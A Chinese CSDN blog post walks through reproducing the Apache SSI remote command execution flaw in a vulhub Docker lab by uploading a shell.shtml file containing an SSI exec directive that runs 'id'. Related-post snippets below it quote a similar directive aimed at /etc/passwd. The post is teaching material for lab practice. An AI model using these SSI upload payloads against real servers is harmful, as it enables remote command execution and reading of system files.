Apache SSI 远程命令执行漏洞(SSI注入漏洞)复现 _ _使用vulhub搭建环境

已于 2023-02-23 09:21:58 修改
阅读量322 收藏
点赞数
分类专栏: 漏洞 文章标签: apache 安全 web安全 Powered by 金山文档
于 2023-02-19 18:29:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57028135/article/details/129112562
版权
在Ubuntu实验环境中,通过vulhub搭建了HTTPDSSI-RCE的测试靶场。首先,从vulhub官网获取漏洞路径,然后在指定目录下使用docker-compose启动测试服务。当环境启动后,访问8080端口的upload.php,利用上传功能提交包含恶意命令的shell.shtml文件。成功访问上传的文件,显示出执行的id命令结果,证明了远程命令执行漏洞的存在。
摘要由CSDN通过智能技术生成

实验环境:Ubuntu

一、vulhub官网找到漏洞路径:

二、启动测试环境

测试环境vulhub搭建:(241条消息) 部署vulhub漏洞测试环境(靶场,用于漏洞复现搭建环境)_net1996的博客-CSDN博客

进入漏洞目录:cd vulhub/httpd/ssi-rce

启动测试环境:docker-compose up -d

(遇到错误可以重启机器试试)

三、漏洞复现

(1)启动环境后访问http://ip地址:8080/upload.php,即可看到一个上传表单。
(2)上传一个shell.shtml文件

<!--#exec cmd="id" -->

(3)浏览器访问上传的文件,下图可以看到成功执行代码,说明存在远程命令执行漏洞

net1996
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
apache SSI远程命令执行漏洞
afei001
01-15 212
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 4.1 Vulnhub搭建漏洞环境 4.2 apache SSI远程命令执行漏洞利用 5.漏洞修复 1.漏洞概述 SSI(Server Side Includes),即服务端包含。SSI嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。 通过SSI注入漏洞执行系统命令,并返回对应的结果...
Apache[多后缀文件名解析漏洞+换行解析漏洞+SSI远程命令执行漏洞]复现
weixin_45253622的博客
05-09 8244
一、多后缀文件解析漏洞 Apache的多后缀名特性: 如果一个文件有多个后缀名,那么Apache会从后(右)往前(左)辨别后缀。所以攻击者在可以上传文件的地方上传hack.php.xxx的文件,假设网站有对php的后缀进行过滤,但判断是xxx文件,不在黑名单里,安全检查就会放行,然而Apache的多后缀名特性会以倒数第二个后缀".php"为准,把该文件当做是php文件,解析执行。但是需要把 php5.conf文件中的正则表达式的“$”换成".",然后重启。 总结:Apache文件解析漏洞就是由于用户在
SSI注入
发哥微课堂
06-28 929
0x00:介绍 SSI 是 Server Side Includes 的缩写,即服务端包含。我们都知道像后台语言 php、asp 等都有文件包含的函数 include,包含一些公共的函数库等。那么 html 也有这种包含的机制,我们可以把它叫做 SSISSI 还有一些使用情况例如,页面需要动态加入一些内容,这些内容常见的比如自己的 ip 地址,自己的位置信息等。SSI 默认的文件类型是 sht...
[Apache SSI远程命令执行漏洞]
m0_71635484的博客
02-20 356
Apache SSI远程命令执行漏洞
07 - vulhub - Apache SSI 远程命令执行漏洞
易编橙 · 终身成长社群,相遇已是上上签!
10-15 1217
SSI简介: 漏洞复现之前,要知道SSI是什么,那么SSI是什么呢? SSI----即server-side includes SSI功能: SSI提供了一种对现有HTML文档增加动态内容的方法,不需要编写复杂的JSP/PHP/ASP等程序或者调用CGI程序。 SSI用法: SSI的语法格式类似HTML的注释,因此正确启用SSI之后,浏览器可以忽略他但是源码仍然可见,服务器会对特定的SSI指令解析,从而实现少量动态内容的添加。
SSI注入漏洞
Hydra的博客
11-19 9462
SSI 注入全称Server-Side Includes Injection,即服务端包含注入SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程Web 应用中注入脚本来执行代码。 SSI嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。 从技术角度上来说,SSI就是...
Apache SSI 远程命令执行漏洞SSI注入漏洞
qq_45521281的博客
07-25 3096
SSI 服务器端包含 SSI(server-side includes)能帮我们实现什么功能: SSI提供了一种对现有HTML文档增加动态内容的方法,即在html中加入动态内容。 SSI嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。 从技术角度上来说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意命令。 在测试任意文件上传漏洞的时候,目标
Apache SSI 远程命令执行漏洞复现实验报告
weixin_48400575的博客
02-26 4195
Apache SSI 远程命令执行漏洞复现实验报告
07 - vulhub - Apache SSI 远程命令执行漏洞,带你碾压面试官
m0_67621628的博客
03-22 648
<!--#echo var="cat /etc/passwd" --> []( )漏洞复现 []( )环境准备 靶机环境 139.196.87.102 (vulhub) 攻击机环境 192.168.8.131 (虚拟机 Ubuntu 20、Java1.8、Burp) 启动 Apache SSI 远程命令执行漏洞 环境 1.进入 vulhubssi-rce 路径 cd /usr/local/tools/vulhub/httpd/ssi-rce 2.编译并启动环境 docker-c
利用Vulnhub复现漏洞 - Apache SSI 远程命令执行漏洞
JiangBuLiu的博客
06-28 1331
Apache SSI 远程命令执行漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/httpd/ssi-rce/ 漏洞原理 在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用<!--#...
Apache SSI 远程命令执行漏洞
m0_52701599的博客
02-19 834
Apache SSI 远程命令执行漏洞
漏洞复现-Apache SSI 远程命令执行漏洞
最新发布
网安小白的博客
02-20 240
Apache SSI 远程命令执行漏洞复现
代码审计后的SSI注入漏洞
qq_53142368的博客
11-19 3116
[BJDCTF2020]EasySearch 首先就是dirsearch扫描,用dirsearch的前提一定是前端看不到啥东西了,呢就不用猜,绝对有一些隐藏文件。 然后dirsearch就扫描出来了index;php.swp文件。。。 然后就看到了源码 进行代码审计 [<?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#
漏洞复现——Apache SSI远程命令执行
weixin_30678349的博客
02-07 641
漏洞原理:当目标服务器开启了SSI与CGI支持,我们就可以上传shtml文件,利用<!--#exec cmd="id" -->语法执行命令SSISSI(服务器端包含)是​​放置在HTML页面中的指令,并在提供页面时在服务器上进行评估。它们允许将动态生成的内容添加到现有HTML页面,而无需通过CGI程序或其他动态技术提供整个页面。 SSIexec命令。它在文档中插入...
Apache SSI 远程命令执行漏洞Apache HTTPD 多后缀解析漏洞复现
weixin_48739941的博客
04-15 3345
1、 Apache SSI 远程命令执行漏洞复现 (1)切换目录:cd vulhub/httpd/ssi-rce。 (2)docker-compose up -d 启动。 (3)访问;http://192.168.254.128:8080/upload.php (4)上传一个php文件,显示不支持的上传的类型。 (5)上传.shtml文件。 (6)访问上传的文件:http://192.168.254.128:8080/zjf.shtml 2、Apache HTTPD
复现Apache SSI 远程命令执行漏洞
m0_67463450的博客
02-20 211
Apache SSI 远程命令执行漏洞的简单复现
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值